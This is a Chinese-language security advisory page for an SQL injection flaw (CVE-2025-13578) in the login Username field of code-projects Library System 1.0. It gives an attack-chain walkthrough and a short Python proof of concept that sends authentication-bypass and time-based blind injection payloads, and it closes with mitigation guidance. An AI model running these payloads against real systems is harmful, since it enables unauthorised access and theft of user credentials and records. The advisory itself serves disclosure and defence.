CVE-2025-13578 CVSS 7.3 高危

CVE-2025-13578 code-projects Library System 1.0 SQL注入漏洞

披露日期: 2025-11-24

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-13578

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

code-projects Library System 1.0

漏洞概述

CVE-2025-13578是code-projects Library System 1.0中的一个高危SQL注入漏洞。该漏洞存在于登录组件的/index.php文件中 specifically affecting the Username参数。攻击者可以通过构造恶意的SQL payload注入到Username参数中，实现未授权的数据库操作。由于该漏洞可远程利用且无需认证，攻击门槛较低，已被公开披露并可能在野被利用。CVSS评分7.3属于高危级别，机密性、完整性和可用性均有低至中等程度的影响。该系统为开源图书管理系统，漏洞的广泛传播可能对使用该系统的机构造成严重安全威胁。

技术细节

该SQL注入漏洞存在于code-projects Library System 1.0的登录功能中，攻击者通过在/index.php的Login组件Username参数中注入恶意SQL语句来实现攻击。由于输入验证不足，恶意SQL代码被直接拼接到数据库查询语句中执行。攻击者可利用UNION SELECT、布尔盲注或时间盲注等技术获取数据库中的敏感信息，包括用户凭据、图书信息、借阅记录等。漏洞的利用无需任何认证，攻击者可直接通过HTTP请求发起攻击。成功利用后可能导致数据泄露、数据篡改甚至在某些配置下实现远程代码执行。

攻击链分析

STEP 1

步骤1

攻击者识别目标网站使用的是code-projects Library System 1.0

STEP 2

步骤2

访问登录页面/index.php，定位Username输入参数

STEP 3

步骤3

构造SQL注入payload，如' OR 1=1 -- -或UNION SELECT语句

STEP 4

步骤4

发送恶意HTTP POST请求到/index.php

STEP 5

步骤5

利用SQL注入获取数据库敏感信息或绕过认证

STEP 6

步骤6

根据获取的数据进一步横向移动或进行数据窃取

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-13578 SQL Injection PoC
# Target: code-projects Library System 1.0
# Component: /index.php Login Username parameter

target_url = "http://target-site.com/index.php"

# SQL Injection payload - Boolean based blind injection
payload = "' OR 1=1 -- -"

data = {
    "Username": payload,
    "Password": "any_password"
}

try:
    response = requests.post(target_url, data=data, timeout=10)
    if "welcome" in response.text.lower() or response.status_code == 200:
        print("[+] SQL Injection Successful - Authentication Bypassed")
    else:
        print("[-] Injection Failed")
except requests.RequestException as e:
    print(f"[-] Error: {e}")

# Time-based blind SQL injection payload
time_payload = "' AND SLEEP(5) -- -"
data_time = {"Username": time_payload, "Password": "test"}

try:
    response = requests.post(target_url, data=data_time, timeout=15)
    if response.elapsed.total_seconds() >= 5:
        print("[+] Time-based blind SQL injection confirmed")
except:
    pass

影响范围

code-projects Library System 1.0

防御指南

临时缓解措施

立即停止使用code-projects Library System 1.0或应用官方安全补丁。对登录模块的所有用户输入实施严格的输入验证，使用参数化查询重构登录验证逻辑。部署WAF规则阻断SQL注入攻击流量。临时措施可考虑限制访问源IP或关闭登录功能，待修复后再恢复服务。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-13578
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-13578
3 Details https://www.cvedetails.com/cve/CVE-2025-13578/
4 VulDB https://vuldb.com/cve/CVE-2025-13578
5 Link https://code-projects.org/
6 Link https://github.com/rassec2/dbcve/issues/4
7 Link https://vuldb.com/?ctiid.333342
8 Link https://vuldb.com/?id.333342
9 Link https://vuldb.com/?submit.699536

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表